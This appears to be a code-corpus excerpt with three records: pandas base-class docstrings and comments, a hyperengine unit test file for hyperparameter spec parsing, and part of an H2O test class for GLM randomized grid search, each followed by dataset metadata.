Mixin which prevents adding new attributes.
Prevents additional attributes via xxx.attribute = "something" after a
call to `self.__freeze()`. Mainly used to prevent the user from using
wrong attributes on an accessor (`Series.cat/.str/.dt`).
If you really want to add a new attribute at a later time, you need to use
`object.__setattr__(self, key, value)`.
Baseclass for various pandas objects.
mixin implementing the selection & aggregation interface on a group-like
object sub-classes need to define: obj, exclusions
Return an iterator of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
iterator
Return a string representation for a particular object.
Generates the total memory usage for an object that returns
either a value or Series of values
Construct an appropriately-wrapped result from the ArrayLike result
of an arithmetic-like operation.
Class constructor (for this class it's just `__class__`.
Prevents setting additional attributes.
sub-classes to define
return a sliced object
Parameters
----------
key : str / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
An internal function that maps values using the input
correspondence (which can be a dict, Series, or function).
Parameters
----------
mapper : function, dict, or Series
The input correspondence object
na_action : {None, 'ignore'}
If 'ignore', propagate NA values, without passing them to the
mapping function
Returns
-------
Union[Index, MultiIndex], inferred
The output of the mapping function applied to the index.
If the function returns a tuple with more than one element
a MultiIndex will be returned.
Memory usage of the values.
Parameters
----------
deep : bool, default False
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption.
Returns
-------
bytes used
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of the
array.
Notes
-----
Memory usage does not include memory consumed by elements that
are not components of the array if deep=False or if used on PyPy
Perform the reduction type operation if we can.
Reset cached properties. If ``key`` is passed, only clears that key.
Return int position of the {value} value in the Series.
If the {op}imum is achieved in multiple locations,
the first row position is returned.
Parameters
----------
axis : {{None}}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
int
Row position of the {op}imum value.
See Also
--------
Series.arg{op} : Return position of the {op}imum value.
Series.arg{oppose} : Return position of the {oppose}imum value.
numpy.ndarray.arg{op} : Equivalent method for numpy arrays.
Series.idxmax : Return index label of the maximum values.
Series.idxmin : Return index label of the minimum values.
Examples
--------
Consider dataset containing cereal calories
>>> s = pd.Series({{'Corn Flakes': 100.0, 'Almond Delight': 110.0,
... 'Cinnamon Toast Crunch': 120.0, 'Cocoa Puff': 110.0}})
>>> s
Corn Flakes 100.0
Almond Delight 110.0
Cinnamon Toast Crunch 120.0
Cocoa Puff 110.0
dtype: float64
>>> s.argmax()
2
>>> s.argmin()
0
The maximum cereal calories is the third element and
the minimum cereal calories is the first element,
since series is zero-indexed.
The ExtensionArray of the data backing this Series or Index.
Returns
-------
ExtensionArray
An ExtensionArray of the values stored within. For extension
types, this is the actual array. For NumPy native types, this
is a thin (no copy) wrapper around :class:`numpy.ndarray`.
``.array`` differs ``.values`` which may require converting the
data to a different form.
See Also
--------
Index.to_numpy : Similar method that always returns a NumPy array.
Series.to_numpy : Similar method that always returns a NumPy array.
Notes
-----
This table lays out the different array types for each extension
dtype within pandas.
================== =============================
dtype array type
================== =============================
category Categorical
period PeriodArray
interval IntervalArray
IntegerNA IntegerArray
string StringArray
boolean BooleanArray
datetime64[ns, tz] DatetimeArray
================== =============================
For any 3rd-party extension types, the array type will be an
ExtensionArray.
For all remaining dtypes ``.array`` will be a
:class:`arrays.NumpyExtensionArray` wrapping the actual ndarray
stored within. If you absolutely need a NumPy array (possibly with
copying / coercing data), then use :meth:`Series.to_numpy` instead.
Examples
--------
For regular NumPy types like int, and float, a PandasArray
is returned.
>>> pd.Series([1, 2, 3]).array
<PandasArray>
[1, 2, 3]
Length: 3, dtype: int64
For extension types, like Categorical, the actual ExtensionArray
is returned
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.array
['a', 'b', 'a']
Categories (2, object): ['a', 'b']
Return if I have any nans; enables various perf speedups.
Return boolean if values in the object are
monotonic_increasing.
Returns
-------
bool
Return boolean if values in the object are
monotonic_decreasing.
Returns
-------
bool
Alias for is_monotonic.
Return boolean if values in the object are unique.
Returns
-------
bool
Return the first element of the underlying data as a Python scalar.
Returns
-------
scalar
The first element of %(klass)s.
Raises
------
ValueError
If the data is not length-1.
Return the maximum value of the Index.
Parameters
----------
axis : int, optional
For compatibility with NumPy. Only 0 or None are allowed.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Maximum value.
See Also
--------
Index.min : Return the minimum value in an Index.
Series.max : Return the maximum value in a Series.
DataFrame.max : Return the maximum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.max()
3
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.max()
'c'
For a MultiIndex, the maximum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.max()
('b', 2)
Return the minimum value of the Index.
Parameters
----------
axis : {None}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Minimum value.
See Also
--------
Index.max : Return the maximum value of the object.
Series.min : Return the minimum value in a Series.
DataFrame.min : Return the minimum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.min()
1
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.min()
'a'
For a MultiIndex, the minimum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.min()
('a', 1)
Return the number of bytes in the underlying data.
Number of dimensions of the underlying data, by definition 1.
Return number of unique elements in the object.
Excludes NA values by default.
Parameters
----------
dropna : bool, default True
Don't include NaN in the count.
Returns
-------
int
See Also
--------
DataFrame.nunique: Method nunique for DataFrame.
Series.count: Count non-NA/null observations in the Series.
Examples
--------
>>> s = pd.Series([1, 3, 5, 7, 7])
>>> s
0 1
1 3
2 5
3 7
4 7
dtype: int64
>>> s.nunique()
4
Return a tuple of the shape of the underlying data.
Return the number of elements in the underlying data.
A NumPy ndarray representing the values in this Series or Index.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to pass to :meth:`numpy.asarray`.
copy : bool, default False
Whether to ensure that the returned value is not a view on
another array. Note that ``copy=False`` does not *ensure* that
``to_numpy()`` is no-copy. Rather, ``copy=True`` ensure that
a copy is made, even if not strictly necessary.
na_value : Any, optional
The value to use for missing values. The default value depends
on `dtype` and the type of the array.
.. versionadded:: 1.0.0
**kwargs
Additional keywords passed through to the ``to_numpy`` method
of the underlying array (for extension arrays).
.. versionadded:: 1.0.0
Returns
-------
numpy.ndarray
See Also
--------
Series.array : Get the actual data stored within.
Index.array : Get the actual data stored within.
DataFrame.to_numpy : Similar method for DataFrame.
Notes
-----
The returned array will be the same up to equality (values equal
in `self` will be equal in the returned array; likewise for values
that are not equal). When `self` contains an ExtensionArray, the
dtype may be different. For example, for a category-dtype Series,
``to_numpy()`` will return a NumPy array and the categorical dtype
will be lost.
For NumPy dtypes, this will be a reference to the actual data stored
in this Series or Index (assuming ``copy=False``). Modifying the result
in place will modify the data stored in the Series or Index (not that
we recommend doing that).
For extension types, ``to_numpy()`` *may* require copying data and
coercing the result to a NumPy type (possibly object), which may be
expensive. When you need a no-copy reference to the underlying data,
:attr:`Series.array` should be used instead.
This table lays out the different dtypes and default return types of
``to_numpy()`` for various dtypes within pandas.
================== ================================
dtype array type
================== ================================
category[T] ndarray[T] (same dtype as input)
period ndarray[object] (Periods)
interval ndarray[object] (Intervals)
IntegerNA ndarray[object]
datetime64[ns] datetime64[ns]
datetime64[ns, tz] ndarray[object] (Timestamps)
================== ================================
Examples
--------
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.to_numpy()
array(['a', 'b', 'a'], dtype=object)
Specify the `dtype` to control how datetime-aware data is represented.
Use ``dtype=object`` to return an ndarray of pandas :class:`Timestamp`
objects, each with the correct ``tz``.
>>> ser = pd.Series(pd.date_range('2000', periods=2, tz="CET"))
>>> ser.to_numpy(dtype=object)
array([Timestamp('2000-01-01 00:00:00+0100', tz='CET'),
Timestamp('2000-01-02 00:00:00+0100', tz='CET')],
dtype=object)
Or ``dtype='datetime64[ns]'`` to return an ndarray of native
datetime64 values. The values are converted to UTC and the timezone
info is dropped.
>>> ser.to_numpy(dtype="datetime64[ns]")
... # doctest: +ELLIPSIS
array(['1999-12-31T23:00:00.000000000', '2000-01-01T23:00:00...'],
dtype='datetime64[ns]')
Return a list of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
list
See Also
--------
numpy.ndarray.tolist : Return the array as an a.ndim-levels deep
nested list of Python scalars.
Return the transpose, which is by definition self.
Returns
-------
%(klass)s
Return a Series containing counts of unique values.
The resulting object will be in descending order so that the
first element is the most frequently-occurring element.
Excludes NA values by default.
Parameters
----------
normalize : bool, default False
If True then the object returned will contain the relative
frequencies of the unique values.
sort : bool, default True
Sort by frequencies.
ascending : bool, default False
Sort in ascending order.
bins : int, optional
Rather than count values, group them into half-open bins,
a convenience for ``pd.cut``, only works with numeric data.
dropna : bool, default True
Don't include counts of NaN.
Returns
-------
Series
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.count: Number of non-NA elements in a DataFrame.
DataFrame.value_counts: Equivalent method on DataFrames.
Examples
--------
>>> index = pd.Index([3, 1, 2, 3, 4, np.nan])
>>> index.value_counts()
3.0 2
1.0 1
2.0 1
4.0 1
dtype: int64
With `normalize` set to `True`, returns the relative frequency by
dividing all values by the sum of values.
>>> s = pd.Series([3, 1, 2, 3, 4, np.nan])
>>> s.value_counts(normalize=True)
3.0 0.4
1.0 0.2
2.0 0.2
4.0 0.2
dtype: float64
**bins**
Bins can be useful for going from a continuous variable to a
categorical variable; instead of counting unique
apparitions of values, divide the index in the specified
number of half-open bins.
>>> s.value_counts(bins=3)
(0.996, 2.0] 2
(2.0, 3.0] 2
(3.0, 4.0] 1
dtype: int64
**dropna**
With `dropna` set to `False` we can also see NaN index values.
>>> s.value_counts(dropna=False)
3.0 2
1.0 1
2.0 1
4.0 1
NaN 1
dtype: int64
Base and utility classes for pandas objects.
results from calls to methods decorated with cache_readonly get added to _cache Should be overwritten by base classes no memory_usage attribute, so fall back to object's 'sizeof' prevent adding any attribute via s.xxx.new_attribute = ... _cache is used by a decorator We need to check both 1.) cls.__dict__ and 2.) getattr(self, key) because 1.) getattr is false for attributes that raise errors 2.) cls.__dict__ doesn't traverse into base classes equivalent to `self.obj.drop(self.exclusions, axis=1) but this avoids consolidating and making a copy ndarray compatibility tolist is not deprecated, just suppressed in the __dir__ must be defined here as a property for mypy must be defined here as a property for mypy We need this defined here for mypy error: Too many arguments for "to_numpy" of "ExtensionArray" type: ignore[call-arg] TODO(GH-24345): Avoid potential double copy error: Incompatible return value type (got "Union[int, ndarray]", expected "int") type: ignore[return-value] error: Incompatible return value type (got "Union[int, ndarray]", expected "int") type: ignore[return-value] check for ndarray instead of dtype to catch DTA/TDA We are explicitly making element iterators. Check type instead of dtype to catch DTA/TDA we can fastpath dict/Series to an efficient map as we know that we are not going to have to yield python types If a dictionary subclass defines a default value method, convert mapper to a lookup function (GH 15999). Dictionary does not have a default. Thus it's safe to convert to an Series for efficiency. we specify the keys here to handle the possibility that they are tuples The return value of mapping with an empty mapper is expected to be pd.Series(np.nan, ...). As np.nan is of dtype float64 the return value of this method should be float64 as well Since values were input this means we came from either a dict or a series and mapper should be an index use the built in categorical series mapper which saves time by mapping the categories instead of all values we must convert to python types GH23179 some EAs do not have `map` mapper is a function GH31182 Series._values returns EA, unpack for backward-compat mypy complains if we alias directly https://github.com/python/mypy/issues/1424 error: "ExtensionArray" has no attribute "memory_usage" type: ignore[attr-defined] error: Value of type "IndexOpsMixin" is not indexable type: ignore[index] | 16,007 | en | 0.607412 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'maxim'
import six
import unittest
from hyperengine.spec import *
class SpecTest(unittest.TestCase):
def test_zero_nodes(self):
def check_zero_nodes(spec):
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 0)
self.assertEqual(spec, parsed.instantiate([]))
check_zero_nodes(1)
check_zero_nodes([])
check_zero_nodes([1, 2, 3])
check_zero_nodes((1, 2, 3))
check_zero_nodes({})
check_zero_nodes({'a': 0, 'b': 1})
check_zero_nodes({'a': [1, 2], 'b': {'key': (1, 2)}})
def test_uniform(self):
spec = uniform()
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(0.0, parsed.instantiate([0.0]))
self.assertEqual(0.5, parsed.instantiate([0.5]))
self.assertEqual(1.0, parsed.instantiate([1.0]))
def test_uniform_rev(self):
spec = uniform(4, 0)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(0.0, parsed.instantiate([0.0]))
self.assertEqual(2.0, parsed.instantiate([0.5]))
self.assertEqual(4.0, parsed.instantiate([1.0]))
def test_uniform_negative(self):
spec = uniform(-4, -2)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(-4.0, parsed.instantiate([0.0]))
self.assertEqual(-3.0, parsed.instantiate([0.5]))
self.assertEqual(-2.0, parsed.instantiate([1.0]))
def test_uniform_negative_rev(self):
spec = uniform(-2, -4)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(-4.0, parsed.instantiate([0.0]))
self.assertEqual(-3.0, parsed.instantiate([0.5]))
self.assertEqual(-2.0, parsed.instantiate([1.0]))
def test_normal(self):
spec = normal()
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertAlmostEqual(-1.0, parsed.instantiate([0.1587]), delta=0.001)
self.assertAlmostEqual(-0.5, parsed.instantiate([0.3085]), delta=0.001)
self.assertAlmostEqual( 0.0, parsed.instantiate([0.5000]), delta=0.001)
self.assertAlmostEqual( 0.7, parsed.instantiate([0.7580]), delta=0.001)
self.assertAlmostEqual( 0.9, parsed.instantiate([0.8159]), delta=0.001)
def test_choice(self):
spec = choice([10, 20, 30])
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(10, parsed.instantiate([0.0]))
self.assertEqual(20, parsed.instantiate([0.5]))
self.assertEqual(30, parsed.instantiate([1.0]))
def test_choice_str(self):
spec = choice(['foo', 'bar'])
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual('foo', parsed.instantiate([0.0]))
self.assertEqual('bar', parsed.instantiate([1.0]))
def test_merge(self):
spec = merge([uniform(), uniform()], lambda x, y: x+y)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual(0.5, parsed.instantiate([0.0, 0.5]))
self.assertEqual(1.5, parsed.instantiate([0.5, 1.0]))
self.assertEqual(2.0, parsed.instantiate([1.0, 1.0]))
def test_transform(self):
spec = wrap(uniform(), lambda x: x*x)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(0.0, parsed.instantiate([0.0]))
self.assertEqual(4.0, parsed.instantiate([2.0]))
def test_transform_merge(self):
spec = wrap(merge([uniform(), uniform()], lambda x, y: x+y), lambda x: x*x)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual(1.0, parsed.instantiate([0.0, 1.0]))
self.assertEqual(4.0, parsed.instantiate([1.0, 1.0]))
def test_duplicate_nodes_1(self):
node = uniform()
spec = merge([node, node, node], lambda x, y, z: x+y+z)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(3.0, parsed.instantiate([1.0]))
self.assertEqual(9.0, parsed.instantiate([3.0]))
def test_duplicate_nodes_2(self):
node = uniform()
spec = [[node, node]]
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual([[1.0, 1.0]], parsed.instantiate([1.0]))
def test_duplicate_nodes_3(self):
spec = [uniform()] * 3
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual([0.0, 0.0, 0.0], parsed.instantiate([0.0]))
self.assertEqual([1.0, 1.0, 1.0], parsed.instantiate([1.0]))
def test_merge_choice(self):
spec = choice([uniform(0, 1), uniform(2, 3)])
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual(0.0, parsed.instantiate([0.0, 0.0, 0.0]))
self.assertEqual(1.0, parsed.instantiate([1.0, 0.0, 0.0]))
self.assertEqual(2.0, parsed.instantiate([0.0, 0.0, 0.9]))
self.assertEqual(3.0, parsed.instantiate([0.0, 1.0, 0.9]))
def test_if_condition(self):
def if_cond(switch, size, num):
if switch > 0.5:
return [size, num, num]
return [size, num]
spec = merge([uniform(0, 1), uniform(1, 2), uniform(2, 3)], if_cond)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual([1, 2], parsed.instantiate([0, 0, 0]))
self.assertEqual([2, 3], parsed.instantiate([0, 1, 1]))
self.assertEqual([1, 2, 2], parsed.instantiate([1, 0, 0]))
self.assertEqual([2, 3, 3], parsed.instantiate([1, 1, 1]))
def test_object(self):
class Dummy: pass
dummy = Dummy
dummy.value = uniform()
dummy.foo = 'bar'
dummy.ref = dummy
spec = dummy
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
instance = parsed.instantiate([0])
self.assertEqual(0, instance.value)
self.assertEqual('bar', instance.foo)
self.assertEqual(instance, instance.ref)
def test_dict(self):
spec = {1: uniform(), 2: choice(['foo', 'bar']), 3: merge(lambda x: -x, uniform())}
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual({1: 0.0, 2: 'foo', 3: 0.0}, parsed.instantiate([0, 0, 0]))
self.assertEqual({1: 1.0, 2: 'bar', 3: -1.0}, parsed.instantiate([1, 1, 1]))
def test_dict_deep_1(self):
spec = {1: {'foo': uniform() } }
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
def test_dict_deep_2(self):
spec = {'a': {'b': {'c': { 'd': uniform() } } } }
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
def test_math_operations_1(self):
spec = uniform() + 1
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(2.0, parsed.instantiate([1.0]))
def test_math_operations_2(self):
spec = uniform() * (uniform() ** 2 + 1) / uniform()
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual(2.0, parsed.instantiate([1.0, 1.0, 1.0]))
self.assertEqual(1.0, parsed.instantiate([0.5, 1.0, 1.0]))
self.assertEqual(1.0, parsed.instantiate([0.5, 0.0, 0.5]))
def test_math_operations_3(self):
spec = 2 / (1 + uniform()) * (3 - uniform() + 4 ** uniform())
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual(6.0, parsed.instantiate([1.0, 1.0, 1.0]))
def test_math_operations_4(self):
spec = choice(['foo', 'bar']) + '-' + choice(['abc', 'def'])
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual('foo-abc', parsed.instantiate([0.0, 0.0]))
self.assertEqual('bar-def', parsed.instantiate([1.0, 1.0]))
def test_min_1(self):
spec = min(uniform(), uniform(), 0.5)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual(0.5, parsed.instantiate([1.0, 0.7]))
self.assertEqual(0.5, parsed.instantiate([1.0, 0.5]))
self.assertEqual(0.0, parsed.instantiate([0.0, 0.5]))
def test_min_2(self):
spec = min(uniform(), 0.8, 0.5)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(0.5, parsed.instantiate([1.0]))
self.assertEqual(0.5, parsed.instantiate([0.5]))
self.assertEqual(0.2, parsed.instantiate([0.2]))
def test_min_3(self):
spec = min(uniform(), uniform())
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual(0.5, parsed.instantiate([1.0, 0.5]))
self.assertEqual(0.2, parsed.instantiate([0.2, 0.5]))
def test_max_1(self):
spec = max(0.5)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 0)
self.assertEqual(0.5, parsed.instantiate([]))
def test_max_2(self):
spec = max(0.5, 1.0)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 0)
self.assertEqual(1.0, parsed.instantiate([]))
def test_max_3(self):
spec = max(uniform())
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(1.0, parsed.instantiate([1.0]))
self.assertEqual(0.0, parsed.instantiate([0.0]))
def test_name_1(self):
aaa = uniform()
bbb = choice(['foo'])
ccc = uniform(-1, 1)
ddd = uniform()
spec = {'aaa': aaa, 'bbb': bbb, 'ccc': ccc **2, 'ddd': [ddd, ddd]}
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 4)
self.assertTrue('aaa' in aaa.name())
self.assertTrue('uniform' in aaa.name())
self.assertTrue('bbb' in bbb.name())
self.assertTrue('choice' in bbb.name())
self.assertTrue('ccc' in ccc.name())
self.assertTrue('uniform' in ccc.name())
self.assertTrue('ddd' in ddd.name())
self.assertTrue('uniform' in ddd.name())
def test_name_2(self):
norm_node = normal()
choice_node = choice([uniform(), uniform(), uniform()])
spec = {'a': {'b': {'c': { 'd': norm_node, 0: choice_node } } } }
# stats.norm.ppf is an instance method in python 2
expected_normal_name = 'norm_gen' if six.PY2 else 'ppf'
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 5)
self.assertTrue('a-b-c-d' in norm_node.name(), 'name=%s' % norm_node.name())
self.assertTrue(expected_normal_name in norm_node.name(), 'name=%s' % norm_node.name())
self.assertTrue('a-b-c-0' in choice_node.name(), 'name=%s' % choice_node.name())
self.assertTrue('choice' in choice_node.name(), 'name=%s' % choice_node.name())
| hyperengine/tests/spec_test.py | 10,198 | ! /usr/bin/env python -*- coding: utf-8 -*- stats.norm.ppf is an instance method in python 2 | 92 | en | 0.584244 |
from __future__ import print_function
import sys
import random
import os
from builtins import range
import time
import json
sys.path.insert(1, "../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
from h2o.grid.grid_search import H2OGridSearch
class Test_glm_random_grid_search:
"""
This class is created to test the three stopping conditions for randomized gridsearch using
GLM Binomial family. The three stopping conditions are :
1. max_runtime_secs:
2. max_models:
3. metrics. We will be picking 2 stopping metrics to test this stopping condition with. One metric
will be optimized if it increases and the other one should be optimized if it decreases.
I have written 4 tests:
1. test1_glm_random_grid_search_model_number: this test will not put any stopping conditions
on randomized search. The purpose here is to make sure that randomized search will give us all possible
hyper-parameter combinations.
2. test2_glm_random_grid_search_max_model: this test the stopping condition of setting the max_model in
search criteria;
3. test3_glm_random_grid_search_max_runtime_secs: this test the stopping condition max_runtime_secs
in search criteria;
4. test4_glm_random_grid_search_metric: this test the stopping condition of using a metric which can be
increasing or decreasing.
"""
# parameters set by users, change with care
curr_time = str(round(time.time()))
# parameters denoting filenames of interested that store training/validation/test data sets in csv format
training1_filename = "smalldata/gridsearch/gaussian_training1_set.csv"
json_filename = "random_gridsearch_GLM_Gaussian_hyper_parameter_" + curr_time + ".json"
allowed_diff = 0.5 # error tolerance allowed
allowed_time_diff = 1e-1 # fraction of max_runtime_secs allowed for max run time stopping criteria
# System parameters, do not change. Dire consequences may follow if you do
current_dir = os.path.dirname(os.path.realpath(sys.argv[1])) # directory of this test file
train_row_count = 0 # training data row count, randomly generated later
train_col_count = 0 # training data column count, randomly generated later
max_int_val = 1000 # maximum size of random integer values
min_int_val = 0 # minimum size of random integer values
max_int_number = 3 # maximum number of integer random grid values to generate
max_real_val = 1 # maximum size of random float values
min_real_val = 0.0 # minimum size of random float values
max_real_number = 3 # maximum number of real grid values to generate
lambda_scale = 100 # scale lambda value to be from 0 to 100 instead of 0 to 1
max_runtime_scale = 3 # scale the max runtime to be different from 0 to 1
one_model_time = 0 # time taken to build one barebone model
possible_number_models = 0 # possible number of models built based on hyper-parameter specification
max_model_number = 0 # maximum number of models specified to test for stopping conditions, generated later
max_grid_runtime = 1 # maximum runtime value in seconds, 1 minute max
allowed_scaled_overtime = 1 # used to set max_allowed_runtime as allowed_scaled_overtime * total model run time
allowed_scaled_time = 1 # how much to scale back max time
allowed_scaled_model_number = 1.5 # used to set max_model_number as
# possible_number_models * allowed_scaled_model_number
max_stopping_rounds = 5 # maximum stopping rounds allowed to be used for early stopping metric
max_tolerance = 0.01 # maximum tolerance to be used for early stopping metric
family = 'gaussian' # set gaussian as default
test_name = "pyunit_glm_gaussian_gridsearch_randomdiscrete_large.py" # name of this test
sandbox_dir = "" # sandbox directory where we are going to save our failed test data sets
# store information about training/test data sets
x_indices = [] # store predictor indices in the data set
y_index = 0 # store response index in the data set
training1_data = [] # store training data sets
total_test_number = 5 # number of tests carried out
test_failed = 0 # count total number of tests that have failed
test_failed_array = [0]*total_test_number # denote test results for all tests run. 1 error, 0 pass
test_num = 0 # index representing which test is being run
# give the user opportunity to pre-assign hyper parameters for fixed values
hyper_params = {}
# parameters to be excluded from hyper parameter list even though they may be gridable
exclude_parameter_lists = ['tweedie_link_power', 'tweedie_variance_power'] # do not need these
# these are supposed to be gridable but not really
exclude_parameter_lists.extend(['fold_column', 'weights_column', 'offset_column'])
# these are excluded for extracting parameters to manually build H2O GLM models
exclude_parameter_lists.extend(['model_id'])
gridable_parameters = [] # store griddable parameter names
gridable_types = [] # store the corresponding griddable parameter types
gridable_defaults = [] # store the gridabble parameter default values
correct_model_number = 0 # count number of models built with correct hyper-parameter specification
nfolds = 5 # enable cross validation to test fold_assignment
def __init__(self, family):
"""
Constructor.
:param family: distribution family for tests
:return: None
"""
self.setup_data() # setup_data training data
self.setup_grid_params() # setup_data grid hyper-parameters
def setup_data(self):
"""
This function performs all initializations necessary:
load the data sets and set the training set indices and response column index
"""
# clean out the sandbox directory first
self.sandbox_dir = pyunit_utils.make_Rsandbox_dir(self.current_dir, self.test_name, True)
# preload data sets
self.training1_data = h2o.import_file(path=pyunit_utils.locate(self.training1_filename))
# set data set indices for predictors and response
self.y_index = self.training1_data.ncol-1
self.x_indices = list(range(self.y_index))
# save the training data files just in case the code crashed.
pyunit_utils.remove_csv_files(self.current_dir, ".csv", action='copy', new_dir_path=self.sandbox_dir)
def setup_grid_params(self):
"""
This function setup the randomized gridsearch parameters that will be used later on:
1. It will first try to grab all the parameters that are griddable and parameters used by GLM.
2. It will find the intersection of parameters that are both griddable and used by GLM.
3. There are several extra parameters that are used by GLM that are denoted as griddable but actually is not.
These parameters have to be discovered manually and they These are captured in self.exclude_parameter_lists.
4. We generate the gridsearch hyper-parameter. For numerical parameters, we will generate those randomly.
For enums, we will include all of them.
:return: None
"""
# build bare bone model to get all parameters
model = H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds)
model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
self.one_model_time = pyunit_utils.find_grid_runtime([model]) # find model train time
print("Time taken to build a base barebone model is {0}".format(self.one_model_time))
# grab all gridable parameters and its type
(self.gridable_parameters, self.gridable_types, self.gridable_defaults) = \
pyunit_utils.get_gridables(model._model_json["parameters"])
# give the user opportunity to pre-assign hyper parameters for fixed values
self.hyper_params = {}
self.hyper_params["fold_assignment"] = ['AUTO', 'Random', 'Modulo']
self.hyper_params["missing_values_handling"] = ['MeanImputation', 'Skip']
# randomly generate griddable parameters
(self.hyper_params, self.gridable_parameters, self.gridable_types, self.gridable_defaults) = \
pyunit_utils.gen_grid_search(model.full_parameters.keys(), self.hyper_params, self.exclude_parameter_lists,
self.gridable_parameters, self.gridable_types, self.gridable_defaults,
random.randint(1, self.max_int_number), self.max_int_val, self.min_int_val,
random.randint(1, self.max_real_number), self.max_real_val, self.min_real_val)
# change the value of lambda parameters to be from 0 to self.lambda_scale instead of 0 to 1.
if "lambda" in list(self.hyper_params):
self.hyper_params["lambda"] = [self.lambda_scale * x for x in self.hyper_params["lambda"]]
time_scale = self.max_runtime_scale * self.one_model_time
# change the value of runtime parameters to be from 0 to self.lambda_scale instead of 0 to 1.
if "max_runtime_secs" in list(self.hyper_params):
self.hyper_params["max_runtime_secs"] = [time_scale * x for x in
self.hyper_params["max_runtime_secs"]]
# number of possible models being built:
self.possible_number_models = pyunit_utils.count_models(self.hyper_params)
# save hyper-parameters in sandbox and current test directories.
pyunit_utils.write_hyper_parameters_json(self.current_dir, self.sandbox_dir, self.json_filename,
self.hyper_params)
def tear_down(self):
"""
This function performs teardown after the dynamic test is completed. If all tests
passed, it will delete all data sets generated since they can be quite large. It
will move the training/validation/test data sets into a Rsandbox directory so that
we can re-run the failed test.
"""
if self.test_failed: # some tests have failed. Need to save data sets for later re-runs
# create Rsandbox directory to keep data sets and weight information
self.sandbox_dir = pyunit_utils.make_Rsandbox_dir(self.current_dir, self.test_name, True)
# Do not want to save all data sets. Only save data sets that are needed for failed tests
pyunit_utils.move_files(self.sandbox_dir, self.training1_data_file, self.training1_filename)
# write out the jenkins job info into log files.
json_file = os.path.join(self.sandbox_dir, self.json_filename)
with open(json_file,'wb') as test_file:
json.dump(self.hyper_params, test_file)
else: # all tests have passed. Delete sandbox if if was not wiped before
pyunit_utils.make_Rsandbox_dir(self.current_dir, self.test_name, False)
def test1_glm_random_grid_search_model_number(self, metric_name):
"""
This test is used to make sure the randomized gridsearch will generate all models specified in the
hyperparameters if no stopping condition is given in the search criterion.
:param metric_name: string to denote what grid search model should be sort by
:return: None
"""
print("*******************************************************************************************")
print("test1_glm_random_grid_search_model_number for GLM " + self.family)
h2o.cluster_info()
